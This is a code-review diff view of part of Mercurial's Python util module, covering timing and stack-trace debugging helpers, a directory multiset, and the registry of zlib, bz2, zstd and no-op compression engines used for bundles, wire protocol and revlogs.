3048 3048 (100, 0.000001, _('%.1f us')),
3049 3049 (10, 0.000001, _('%.2f us')),
3050 3050 (1, 0.000001, _('%.3f us')),
3051 3051 (100, 0.000000001, _('%.1f ns')),
3052 3052 (10, 0.000000001, _('%.2f ns')),
3053 3053 (1, 0.000000001, _('%.3f ns')),
3054 3054 )
3055 3055
3056 3056 _timenesting = [0]
3057 3057
3058 3058 def timed(func):
3059 3059 '''Report the execution time of a function call to stderr.
3060 3060
3061 3061 During development, use as a decorator when you need to measure
3062 3062 the cost of a function, e.g. as follows:
3063 3063
3064 3064 @util.timed
3065 3065 def foo(a, b, c):
3066 3066 pass
3067 3067 '''
3068 3068
3069 3069 def wrapper(*args, **kwargs):
3070 3070 start = timer()
3071 3071 indent = 2
3072 3072 _timenesting[0] += indent
3073 3073 try:
3074 3074 return func(*args, **kwargs)
3075 3075 finally:
3076 3076 elapsed = timer() - start
3077 3077 _timenesting[0] -= indent
3078 3078 stderr.write('%s%s: %s\n' %
3079 3079 (' ' * _timenesting[0], func.__name__,
3080 3080 timecount(elapsed)))
3081 3081 return wrapper
3082 3082
3083 3083 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3084 3084 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3085 3085
3086 3086 def sizetoint(s):
3087 3087 '''Convert a space specifier to a byte count.
3088 3088
3089 3089 >>> sizetoint(b'30')
3090 3090 30
3091 3091 >>> sizetoint(b'2.2kb')
3092 3092 2252
3093 3093 >>> sizetoint(b'6M')
3094 3094 6291456
3095 3095 '''
3096 3096 t = s.strip().lower()
3097 3097 try:
3098 3098 for k, u in _sizeunits:
3099 3099 if t.endswith(k):
3100 3100 return int(float(t[:-len(k)]) * u)
3101 3101 return int(t)
3102 3102 except ValueError:
3103 3103 raise error.ParseError(_("couldn't parse size: %s") % s)
3104 3104
3105 3105 class hooks(object):
3106 3106 '''A collection of hook functions that can be used to extend a
3107 3107 function's behavior. Hooks are called in lexicographic order,
3108 3108 based on the names of their sources.'''
3109 3109
3110 3110 def __init__(self):
3111 3111 self._hooks = []
3112 3112
3113 3113 def add(self, source, hook):
3114 3114 self._hooks.append((source, hook))
3115 3115
3116 3116 def __call__(self, *args):
3117 3117 self._hooks.sort(key=lambda x: x[0])
3118 3118 results = []
3119 3119 for source, hook in self._hooks:
3120 3120 results.append(hook(*args))
3121 3121 return results
3122 3122
3123 3123 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%s', depth=0):
3124 3124 '''Yields lines for a nicely formatted stacktrace.
3125 3125 Skips the 'skip' last entries, then return the last 'depth' entries.
3126 3126 Each file+linenumber is formatted according to fileline.
3127 3127 Each line is formatted according to line.
3128 3128 If line is None, it yields:
3129 3129 length of longest filepath+line number,
3130 3130 filepath+linenumber,
3131 3131 function
3132 3132
3133 3133 Not be used in production code but very convenient while developing.
3134 3134 '''
3135 3135 entries = [(fileline % (fn, ln), func)
3136 3136 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3137 3137 ][-depth:]
3138 3138 if entries:
3139 3139 fnmax = max(len(entry[0]) for entry in entries)
3140 3140 for fnln, func in entries:
3141 3141 if line is None:
3142 3142 yield (fnmax, fnln, func)
3143 3143 else:
3144 3144 yield line % (fnmax, fnln, func)
3145 3145
3146 3146 def debugstacktrace(msg='stacktrace', skip=0,
3147 3147 f=stderr, otherf=stdout, depth=0):
3148 3148 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3149 3149 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3150 3150 By default it will flush stdout first.
3151 3151 It can be used everywhere and intentionally does not require an ui object.
3152 3152 Not be used in production code but very convenient while developing.
3153 3153 '''
3154 3154 if otherf:
3155 3155 otherf.flush()
3156 3156 f.write('%s at:\n' % msg.rstrip())
3157 3157 for line in getstackframes(skip + 1, depth=depth):
3158 3158 f.write(line)
3159 3159 f.flush()
3160 3160
3161 3161 class dirs(object):
3162 3162 '''a multiset of directory names from a dirstate or manifest'''
3163 3163
3164 3164 def __init__(self, map, skip=None):
3165 3165 self._dirs = {}
3166 3166 addpath = self.addpath
3167 3167 if safehasattr(map, 'iteritems') and skip is not None:
3168 3168 for f, s in map.iteritems():
3169 3169 if s[0] != skip:
3170 3170 addpath(f)
3171 3171 else:
3172 3172 for f in map:
3173 3173 addpath(f)
3174 3174
3175 3175 def addpath(self, path):
3176 3176 dirs = self._dirs
3177 3177 for base in finddirs(path):
3178 3178 if base in dirs:
3179 3179 dirs[base] += 1
3180 3180 return
3181 3181 dirs[base] = 1
3182 3182
3183 3183 def delpath(self, path):
3184 3184 dirs = self._dirs
3185 3185 for base in finddirs(path):
3186 3186 if dirs[base] > 1:
3187 3187 dirs[base] -= 1
3188 3188 return
3189 3189 del dirs[base]
3190 3190
3191 3191 def __iter__(self):
3192 3192 return iter(self._dirs)
3193 3193
3194 3194 def __contains__(self, d):
3195 3195 return d in self._dirs
3196 3196
3197 3197 if safehasattr(parsers, 'dirs'):
3198 3198 dirs = parsers.dirs
3199 3199
3200 3200 def finddirs(path):
3201 3201 pos = path.rfind('/')
3202 3202 while pos != -1:
3203 3203 yield path[:pos]
3204 3204 pos = path.rfind('/', 0, pos)
3205 3205
3206 3206 # compression code
3207 3207
3208 3208 SERVERROLE = 'server'
3209 3209 CLIENTROLE = 'client'
3210 3210
3211 3211 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3212 3212 (u'name', u'serverpriority',
3213 3213 u'clientpriority'))
3214 3214
3215 3215 class compressormanager(object):
3216 3216 """Holds registrations of various compression engines.
3217 3217
3218 3218 This class essentially abstracts the differences between compression
3219 3219 engines to allow new compression formats to be added easily, possibly from
3220 3220 extensions.
3221 3221
3222 3222 Compressors are registered against the global instance by calling its
3223 3223 ``register()`` method.
3224 3224 """
3225 3225 def __init__(self):
3226 3226 self._engines = {}
3227 3227 # Bundle spec human name to engine name.
3228 3228 self._bundlenames = {}
3229 3229 # Internal bundle identifier to engine name.
3230 3230 self._bundletypes = {}
3231 3231 # Revlog header to engine name.
3232 3232 self._revlogheaders = {}
3233 3233 # Wire proto identifier to engine name.
3234 3234 self._wiretypes = {}
3235 3235
3236 3236 def __getitem__(self, key):
3237 3237 return self._engines[key]
3238 3238
3239 3239 def __contains__(self, key):
3240 3240 return key in self._engines
3241 3241
3242 3242 def __iter__(self):
3243 3243 return iter(self._engines.keys())
3244 3244
3245 3245 def register(self, engine):
3246 3246 """Register a compression engine with the manager.
3247 3247
3248 3248 The argument must be a ``compressionengine`` instance.
3249 3249 """
3250 3250 if not isinstance(engine, compressionengine):
3251 3251 raise ValueError(_('argument must be a compressionengine'))
3252 3252
3253 3253 name = engine.name()
3254 3254
3255 3255 if name in self._engines:
3256 3256 raise error.Abort(_('compression engine %s already registered') %
3257 3257 name)
3258 3258
3259 3259 bundleinfo = engine.bundletype()
3260 3260 if bundleinfo:
3261 3261 bundlename, bundletype = bundleinfo
3262 3262
3263 3263 if bundlename in self._bundlenames:
3264 3264 raise error.Abort(_('bundle name %s already registered') %
3265 3265 bundlename)
3266 3266 if bundletype in self._bundletypes:
3267 3267 raise error.Abort(_('bundle type %s already registered by %s') %
3268 3268 (bundletype, self._bundletypes[bundletype]))
3269 3269
3270 3270 # No external facing name declared.
3271 3271 if bundlename:
3272 3272 self._bundlenames[bundlename] = name
3273 3273
3274 3274 self._bundletypes[bundletype] = name
3275 3275
3276 3276 wiresupport = engine.wireprotosupport()
3277 3277 if wiresupport:
3278 3278 wiretype = wiresupport.name
3279 3279 if wiretype in self._wiretypes:
3280 3280 raise error.Abort(_('wire protocol compression %s already '
3281 3281 'registered by %s') %
3282 3282 (wiretype, self._wiretypes[wiretype]))
3283 3283
3284 3284 self._wiretypes[wiretype] = name
3285 3285
3286 3286 revlogheader = engine.revlogheader()
3287 3287 if revlogheader and revlogheader in self._revlogheaders:
3288 3288 raise error.Abort(_('revlog header %s already registered by %s') %
3289 3289 (revlogheader, self._revlogheaders[revlogheader]))
3290 3290
3291 3291 if revlogheader:
3292 3292 self._revlogheaders[revlogheader] = name
3293 3293
3294 3294 self._engines[name] = engine
3295 3295
3296 3296 @property
3297 3297 def supportedbundlenames(self):
3298 3298 return set(self._bundlenames.keys())
3299 3299
3300 3300 @property
3301 3301 def supportedbundletypes(self):
3302 3302 return set(self._bundletypes.keys())
3303 3303
3304 3304 def forbundlename(self, bundlename):
3305 3305 """Obtain a compression engine registered to a bundle name.
3306 3306
3307 3307 Will raise KeyError if the bundle type isn't registered.
3308 3308
3309 3309 Will abort if the engine is known but not available.
3310 3310 """
3311 3311 engine = self._engines[self._bundlenames[bundlename]]
3312 3312 if not engine.available():
3313 3313 raise error.Abort(_('compression engine %s could not be loaded') %
3314 3314 engine.name())
3315 3315 return engine
3316 3316
3317 3317 def forbundletype(self, bundletype):
3318 3318 """Obtain a compression engine registered to a bundle type.
3319 3319
3320 3320 Will raise KeyError if the bundle type isn't registered.
3321 3321
3322 3322 Will abort if the engine is known but not available.
3323 3323 """
3324 3324 engine = self._engines[self._bundletypes[bundletype]]
3325 3325 if not engine.available():
3326 3326 raise error.Abort(_('compression engine %s could not be loaded') %
3327 3327 engine.name())
3328 3328 return engine
3329 3329
3330 3330 def supportedwireengines(self, role, onlyavailable=True):
3331 3331 """Obtain compression engines that support the wire protocol.
3332 3332
3333 3333 Returns a list of engines in prioritized order, most desired first.
3334 3334
3335 3335 If ``onlyavailable`` is set, filter out engines that can't be
3336 3336 loaded.
3337 3337 """
3338 3338 assert role in (SERVERROLE, CLIENTROLE)
3339 3339
3340 3340 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3341 3341
3342 3342 engines = [self._engines[e] for e in self._wiretypes.values()]
3343 3343 if onlyavailable:
3344 3344 engines = [e for e in engines if e.available()]
3345 3345
3346 3346 def getkey(e):
3347 3347 # Sort first by priority, highest first. In case of tie, sort
3348 3348 # alphabetically. This is arbitrary, but ensures output is
3349 3349 # stable.
3350 3350 w = e.wireprotosupport()
3351 3351 return -1 * getattr(w, attr), w.name
3352 3352
3353 3353 return list(sorted(engines, key=getkey))
3354 3354
3355 3355 def forwiretype(self, wiretype):
3356 3356 engine = self._engines[self._wiretypes[wiretype]]
3357 3357 if not engine.available():
3358 3358 raise error.Abort(_('compression engine %s could not be loaded') %
3359 3359 engine.name())
3360 3360 return engine
3361 3361
3362 3362 def forrevlogheader(self, header):
3363 3363 """Obtain a compression engine registered to a revlog header.
3364 3364
3365 3365 Will raise KeyError if the revlog header value isn't registered.
3366 3366 """
3367 3367 return self._engines[self._revlogheaders[header]]
3368 3368
3369 3369 compengines = compressormanager()
3370 3370
3371 3371 class compressionengine(object):
3372 3372 """Base class for compression engines.
3373 3373
3374 3374 Compression engines must implement the interface defined by this class.
3375 3375 """
3376 3376 def name(self):
3377 3377 """Returns the name of the compression engine.
3378 3378
3379 3379 This is the key the engine is registered under.
3380 3380
3381 3381 This method must be implemented.
3382 3382 """
3383 3383 raise NotImplementedError()
3384 3384
3385 3385 def available(self):
3386 3386 """Whether the compression engine is available.
3387 3387
3388 3388 The intent of this method is to allow optional compression engines
3389 3389 that may not be available in all installations (such as engines relying
3390 3390 on C extensions that may not be present).
3391 3391 """
3392 3392 return True
3393 3393
3394 3394 def bundletype(self):
3395 3395 """Describes bundle identifiers for this engine.
3396 3396
3397 3397 If this compression engine isn't supported for bundles, returns None.
3398 3398
3399 3399 If this engine can be used for bundles, returns a 2-tuple of strings of
3400 3400 the user-facing "bundle spec" compression name and an internal
3401 3401 identifier used to denote the compression format within bundles. To
3402 3402 exclude the name from external usage, set the first element to ``None``.
3403 3403
3404 3404 If bundle compression is supported, the class must also implement
3405 3405 ``compressstream`` and `decompressorreader``.
3406 3406
3407 3407 The docstring of this method is used in the help system to tell users
3408 3408 about this engine.
3409 3409 """
3410 3410 return None
3411 3411
3412 3412 def wireprotosupport(self):
3413 3413 """Declare support for this compression format on the wire protocol.
3414 3414
3415 3415 If this compression engine isn't supported for compressing wire
3416 3416 protocol payloads, returns None.
3417 3417
3418 3418 Otherwise, returns ``compenginewireprotosupport`` with the following
3419 3419 fields:
3420 3420
3421 3421 * String format identifier
3422 3422 * Integer priority for the server
3423 3423 * Integer priority for the client
3424 3424
3425 3425 The integer priorities are used to order the advertisement of format
3426 3426 support by server and client. The highest integer is advertised
3427 3427 first. Integers with non-positive values aren't advertised.
3428 3428
3429 3429 The priority values are somewhat arbitrary and only used for default
3430 3430 ordering. The relative order can be changed via config options.
3431 3431
3432 3432 If wire protocol compression is supported, the class must also implement
3433 3433 ``compressstream`` and ``decompressorreader``.
3434 3434 """
3435 3435 return None
3436 3436
3437 3437 def revlogheader(self):
3438 3438 """Header added to revlog chunks that identifies this engine.
3439 3439
3440 3440 If this engine can be used to compress revlogs, this method should
3441 3441 return the bytes used to identify chunks compressed with this engine.
3442 3442 Else, the method should return ``None`` to indicate it does not
3443 3443 participate in revlog compression.
3444 3444 """
3445 3445 return None
3446 3446
3447 3447 def compressstream(self, it, opts=None):
3448 3448 """Compress an iterator of chunks.
3449 3449
3450 3450 The method receives an iterator (ideally a generator) of chunks of
3451 3451 bytes to be compressed. It returns an iterator (ideally a generator)
3452 3452 of bytes of chunks representing the compressed output.
3453 3453
3454 3454 Optionally accepts an argument defining how to perform compression.
3455 3455 Each engine treats this argument differently.
3456 3456 """
3457 3457 raise NotImplementedError()
3458 3458
3459 3459 def decompressorreader(self, fh):
3460 3460 """Perform decompression on a file object.
3461 3461
3462 3462 Argument is an object with a ``read(size)`` method that returns
3463 3463 compressed data. Return value is an object with a ``read(size)`` that
3464 3464 returns uncompressed data.
3465 3465 """
3466 3466 raise NotImplementedError()
3467 3467
3468 3468 def revlogcompressor(self, opts=None):
3469 3469 """Obtain an object that can be used to compress revlog entries.
3470 3470
3471 3471 The object has a ``compress(data)`` method that compresses binary
3472 3472 data. This method returns compressed binary data or ``None`` if
3473 3473 the data could not be compressed (too small, not compressible, etc).
3474 3474 The returned data should have a header uniquely identifying this
3475 3475 compression format so decompression can be routed to this engine.
3476 3476 This header should be identified by the ``revlogheader()`` return
3477 3477 value.
3478 3478
3479 3479 The object has a ``decompress(data)`` method that decompresses
3480 3480 data. The method will only be called if ``data`` begins with
3481 3481 ``revlogheader()``. The method should return the raw, uncompressed
3482 3482 data or raise a ``RevlogError``.
3483 3483
3484 3484 The object is reusable but is not thread safe.
3485 3485 """
3486 3486 raise NotImplementedError()
3487 3487
3488 3488 class _zlibengine(compressionengine):
3489 3489 def name(self):
3490 3490 return 'zlib'
3491 3491
3492 3492 def bundletype(self):
3493 3493 """zlib compression using the DEFLATE algorithm.
3494 3494
3495 3495 All Mercurial clients should support this format. The compression
3496 3496 algorithm strikes a reasonable balance between compression ratio
3497 3497 and size.
3498 3498 """
3499 3499 return 'gzip', 'GZ'
3500 3500
3501 3501 def wireprotosupport(self):
3502 3502 return compewireprotosupport('zlib', 20, 20)
3503 3503
3504 3504 def revlogheader(self):
3505 3505 return 'x'
3506 3506
3507 3507 def compressstream(self, it, opts=None):
3508 3508 opts = opts or {}
3509 3509
3510 3510 z = zlib.compressobj(opts.get('level', -1))
3511 3511 for chunk in it:
3512 3512 data = z.compress(chunk)
3513 3513 # Not all calls to compress emit data. It is cheaper to inspect
3514 3514 # here than to feed empty chunks through generator.
3515 3515 if data:
3516 3516 yield data
3517 3517
3518 3518 yield z.flush()
3519 3519
3520 3520 def decompressorreader(self, fh):
3521 3521 def gen():
3522 3522 d = zlib.decompressobj()
3523 3523 for chunk in filechunkiter(fh):
3524 3524 while chunk:
3525 3525 # Limit output size to limit memory.
3526 3526 yield d.decompress(chunk, 2 ** 18)
3527 3527 chunk = d.unconsumed_tail
3528 3528
3529 3529 return chunkbuffer(gen())
3530 3530
3531 3531 class zlibrevlogcompressor(object):
3532 3532 def compress(self, data):
3533 3533 insize = len(data)
3534 3534 # Caller handles empty input case.
3535 3535 assert insize > 0
3536 3536
3537 3537 if insize < 44:
3538 3538 return None
3539 3539
3540 3540 elif insize <= 1000000:
3541 3541 compressed = zlib.compress(data)
3542 3542 if len(compressed) < insize:
3543 3543 return compressed
3544 3544 return None
3545 3545
3546 3546 # zlib makes an internal copy of the input buffer, doubling
3547 3547 # memory usage for large inputs. So do streaming compression
3548 3548 # on large inputs.
3549 3549 else:
3550 3550 z = zlib.compressobj()
3551 3551 parts = []
3552 3552 pos = 0
3553 3553 while pos < insize:
3554 3554 pos2 = pos + 2**20
3555 3555 parts.append(z.compress(data[pos:pos2]))
3556 3556 pos = pos2
3557 3557 parts.append(z.flush())
3558 3558
3559 3559 if sum(map(len, parts)) < insize:
3560 3560 return ''.join(parts)
3561 3561 return None
3562 3562
3563 3563 def decompress(self, data):
3564 3564 try:
3565 3565 return zlib.decompress(data)
3566 3566 except zlib.error as e:
3567 3567 raise error.RevlogError(_('revlog decompress error: %s') %
3568 3568 str(e))
3569 3569
3570 3570 def revlogcompressor(self, opts=None):
3571 3571 return self.zlibrevlogcompressor()
3572 3572
3573 3573 compengines.register(_zlibengine())
3574 3574
3575 3575 class _bz2engine(compressionengine):
3576 3576 def name(self):
3577 3577 return 'bz2'
3578 3578
3579 3579 def bundletype(self):
3580 3580 """An algorithm that produces smaller bundles than ``gzip``.
3581 3581
3582 3582 All Mercurial clients should support this format.
3583 3583
3584 3584 This engine will likely produce smaller bundles than ``gzip`` but
3585 3585 will be significantly slower, both during compression and
3586 3586 decompression.
3587 3587
3588 3588 If available, the ``zstd`` engine can yield similar or better
3589 3589 compression at much higher speeds.
3590 3590 """
3591 3591 return 'bzip2', 'BZ'
3592 3592
3593 3593 # We declare a protocol name but don't advertise by default because
3594 3594 # it is slow.
3595 3595 def wireprotosupport(self):
3596 3596 return compewireprotosupport('bzip2', 0, 0)
3597 3597
3598 3598 def compressstream(self, it, opts=None):
3599 3599 opts = opts or {}
3600 3600 z = bz2.BZ2Compressor(opts.get('level', 9))
3601 3601 for chunk in it:
3602 3602 data = z.compress(chunk)
3603 3603 if data:
3604 3604 yield data
3605 3605
3606 3606 yield z.flush()
3607 3607
3608 3608 def decompressorreader(self, fh):
3609 3609 def gen():
3610 3610 d = bz2.BZ2Decompressor()
3611 3611 for chunk in filechunkiter(fh):
3612 3612 yield d.decompress(chunk)
3613 3613
3614 3614 return chunkbuffer(gen())
3615 3615
3616 3616 compengines.register(_bz2engine())
3617 3617
3618 3618 class _truncatedbz2engine(compressionengine):
3619 3619 def name(self):
3620 3620 return 'bz2truncated'
3621 3621
3622 3622 def bundletype(self):
3623 3623 return None, '_truncatedBZ'
3624 3624
3625 3625 # We don't implement compressstream because it is hackily handled elsewhere.
3626 3626
3627 3627 def decompressorreader(self, fh):
3628 3628 def gen():
3629 3629 # The input stream doesn't have the 'BZ' header. So add it back.
3630 3630 d = bz2.BZ2Decompressor()
3631 3631 d.decompress('BZ')
3632 3632 for chunk in filechunkiter(fh):
3633 3633 yield d.decompress(chunk)
3634 3634
3635 3635 return chunkbuffer(gen())
3636 3636
3637 3637 compengines.register(_truncatedbz2engine())
3638 3638
3639 3639 class _noopengine(compressionengine):
3640 3640 def name(self):
3641 3641 return 'none'
3642 3642
3643 3643 def bundletype(self):
3644 3644 """No compression is performed.
3645 3645
3646 3646 Use this compression engine to explicitly disable compression.
3647 3647 """
3648 3648 return 'none', 'UN'
3649 3649
3650 3650 # Clients always support uncompressed payloads. Servers don't because
3651 3651 # unless you are on a fast network, uncompressed payloads can easily
3652 3652 # saturate your network pipe.
3653 3653 def wireprotosupport(self):
3654 3654 return compewireprotosupport('none', 0, 10)
3655 3655
3656 3656 # We don't implement revlogheader because it is handled specially
3657 3657 # in the revlog class.
3658 3658
3659 3659 def compressstream(self, it, opts=None):
3660 3660 return it
3661 3661
3662 3662 def decompressorreader(self, fh):
3663 3663 return fh
3664 3664
3665 3665 class nooprevlogcompressor(object):
3666 3666 def compress(self, data):
3667 3667 return None
3668 3668
3669 3669 def revlogcompressor(self, opts=None):
3670 3670 return self.nooprevlogcompressor()
3671 3671
3672 3672 compengines.register(_noopengine())
3673 3673
3674 3674 class _zstdengine(compressionengine):
3675 3675 def name(self):
3676 3676 return 'zstd'
3677 3677
3678 3678 @propertycache
3679 3679 def _module(self):
3680 3680 # Not all installs have the zstd module available. So defer importing
3681 3681 # until first access.
3682 3682 try:
3683 3683 from . import zstd
3684 3684 # Force delayed import.
3685 3685 zstd.__version__
3686 3686 return zstd
3687 3687 except ImportError:
3688 3688 return None
3689 3689
3690 3690 def available(self):
3691 3691 return bool(self._module)
3692 3692
3693 3693 def bundletype(self):
3694 3694 """A modern compression algorithm that is fast and highly flexible.
3695 3695
3696 3696 Only supported by Mercurial 4.1 and newer clients.
3697 3697
3698 3698 With the default settings, zstd compression is both faster and yields
3699 3699 better compression than ``gzip``. It also frequently yields better
3700 3700 compression than ``bzip2`` while operating at much higher speeds.
3701 3701
3702 3702 If this engine is available and backwards compatibility is not a
3703 3703 concern, it is likely the best available engine.
3704 3704 """
3705 3705 return 'zstd', 'ZS'
3706 3706
3707 3707 def wireprotosupport(self):
3708 3708 return compewireprotosupport('zstd', 50, 50)
3709 3709
3710 3710 def revlogheader(self):
3711 3711 return '\x28'
3712 3712
3713 3713 def compressstream(self, it, opts=None):
3714 3714 opts = opts or {}
3715 3715 # zstd level 3 is almost always significantly faster than zlib
3716 3716 # while providing no worse compression. It strikes a good balance
3717 3717 # between speed and compression.
3718 3718 level = opts.get('level', 3)
3719 3719
3720 3720 zstd = self._module
3721 3721 z = zstd.ZstdCompressor(level=level).compressobj()
3722 3722 for chunk in it:
3723 3723 data = z.compress(chunk)
3724 3724 if data:
3725 3725 yield data
3726 3726
3727 3727 yield z.flush()
3728 3728
3729 3729 def decompressorreader(self, fh):
3730 3730 zstd = self._module
3731 3731 dctx = zstd.ZstdDecompressor()
3732 3732 return chunkbuffer(dctx.read_from(fh))
3733 3733
3734 3734 class zstdrevlogcompressor(object):
3735 3735 def __init__(self, zstd, level=3):
3736 3736 # Writing the content size adds a few bytes to the output. However,
3737 3737 # it allows decompression to be more optimal since we can
3738 3738 # pre-allocate a buffer to hold the result.
3739 3739 self._cctx = zstd.ZstdCompressor(level=level,
3740 3740 write_content_size=True)
3741 3741 self._dctx = zstd.ZstdDecompressor()
3742 3742 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3743 3743 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3744 3744
3745 3745 def compress(self, data):
3746 3746 insize = len(data)
3747 3747 # Caller handles empty input case.
3748 3748 assert insize > 0
3749 3749
3750 3750 if insize < 50:
3751 3751 return None
3752 3752
3753 3753 elif insize <= 1000000:
3754 3754 compressed = self._cctx.compress(data)
3755 3755 if len(compressed) < insize:
3756 3756 return compressed
3757 3757 return None
3758 3758 else:
3759 3759 z = self._cctx.compressobj()
3760 3760 chunks = []
3761 3761 pos = 0
3762 3762 while pos < insize:
3763 3763 pos2 = pos + self._compinsize
3764 3764 chunk = z.compress(data[pos:pos2])
3765 3765 if chunk:
3766 3766 chunks.append(chunk)
3767 3767 pos = pos2
3768 3768 chunks.append(z.flush())
3769 3769
3770 3770 if sum(map(len, chunks)) < insize:
3771 3771 return ''.join(chunks)
3772 3772 return None
3773 3773
3774 3774 def decompress(self, data):
3775 3775 insize = len(data)
3776 3776
3777 3777 try:
3778 3778 # This was measured to be faster than other streaming
3779 3779 # decompressors.
3780 3780 dobj = self._dctx.decompressobj()
3781 3781 chunks = []
3782 3782 pos = 0
3783 3783 while pos < insize:
3784 3784 pos2 = pos + self._decompinsize
3785 3785 chunk = dobj.decompress(data[pos:pos2])
3786 3786 if chunk:
3787 3787 chunks.append(chunk)
3788 3788 pos = pos2
3789 3789 # Frame should be exhausted, so no finish() API.
3790 3790
3791 3791 return ''.join(chunks)
3792 3792 except Exception as e:
3793 3793 raise error.RevlogError(_('revlog decompress error: %s') %
3794 3794 str(e))
3795 3795
3796 3796 def revlogcompressor(self, opts=None):
3797 3797 opts = opts or {}
3798 3798 return self.zstdrevlogcompressor(self._module,
3799 3799 level=opts.get('level', 3))
3800 3800
3801 3801 compengines.register(_zstdengine())
3802 3802
3803 3803 def bundlecompressiontopics():
3804 3804 """Obtains a list of available bundle compressions for use in help."""
3805 3805 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3806 3806 items = {}
3807 3807
3808 3808 # We need to format the docstring. So use a dummy object/type to hold it
3809 3809 # rather than mutating the original.
3810 3810 class docobject(object):
3811 3811 pass
3812 3812
3813 3813 for name in compengines:
3814 3814 engine = compengines[name]
3815 3815
3816 3816 if not engine.available():
3817 3817 continue
3818 3818
3819 3819 bt = engine.bundletype()
3820 3820 if not bt or not bt[0]:
3821 3821 continue
3822 3822
3823 3823 doc = pycompat.sysstr('``%s``\n %s') % (
3824 3824 bt[0], engine.bundletype.__doc__)
3825 3825
3826 3826 value = docobject()
3827 3827 value.__doc__ = doc
3828 3828 value._origdoc = engine.bundletype.__doc__
3829 3829 value._origfunc = engine.bundletype
3830 3830
3831 3831 items[bt[0]] = value
3832 3832
3833 3833 return items
3834 3834
3835 3835 i18nfunctions = bundlecompressiontopics().values()
3836 3836
3837 3837 # convenient shortcut
3838 3838 dst = debugstacktrace
3839 3839
3840 3840 def safename(f, tag, ctx, others=None):
3841 3841 """
3842 3842 Generate a name that it is safe to rename f to in the given context.
3843 3843
3844 3844 f: filename to rename
3845 3845 tag: a string tag that will be included in the new name
3846 3846 ctx: a context, in which the new name must not exist
3847 3847 others: a set of other filenames that the new name must not be in
3848 3848
3849 3849 Returns a file name of the form oldname~tag[~number] which does not exist
3850 3850 in the provided context and is not in the set of other names.
3851 3851 """
3852 3852 if others is None:
3853 3853 others = set()
3854 3854
3855 3855 fn = '%s~%s' % (f, tag)
3856 3856 if fn not in ctx and fn not in others:
3857 3857 return fn
3858 3858 for n in itertools.count(1):
3859 3859 fn = '%s~%s~%s' % (f, tag, n)
3860 3860 if fn not in ctx and fn not in others:
3861 3861 return fn
General Comments 0
You need to be logged in to leave comments. Login now